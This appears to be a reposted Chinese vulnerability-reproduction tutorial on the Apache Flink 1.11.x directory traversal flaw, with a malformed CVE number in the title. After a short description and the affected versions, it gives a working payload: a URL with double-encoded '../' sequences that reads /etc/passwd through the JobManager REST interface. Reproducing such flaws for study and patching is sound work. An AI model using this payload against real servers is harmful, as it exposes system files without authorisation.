700字范文,内容丰富有趣,生活中的好帮手!
700字范文 > 漏洞复现----12 Apache Flink目录穿越漏洞(CVE--17519 )

漏洞复现----12 Apache Flink目录穿越漏洞(CVE--17519 )

时间:2021-05-05 17:53:47

相关推荐

漏洞复现----12 Apache Flink目录穿越漏洞(CVE--17519 )

文章目录

一、漏洞简介二、漏洞复现

一、漏洞简介

Apache Flink 1.11.0中引入的更改,允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。但是访问仅限于JobManager进程可访问的文件。

影响版本:1.11.0、1.11.1、1.11.2


二、漏洞复现

Payload:192.168.198.132:8081/#/job-manager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

/进行二次编码%252f

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。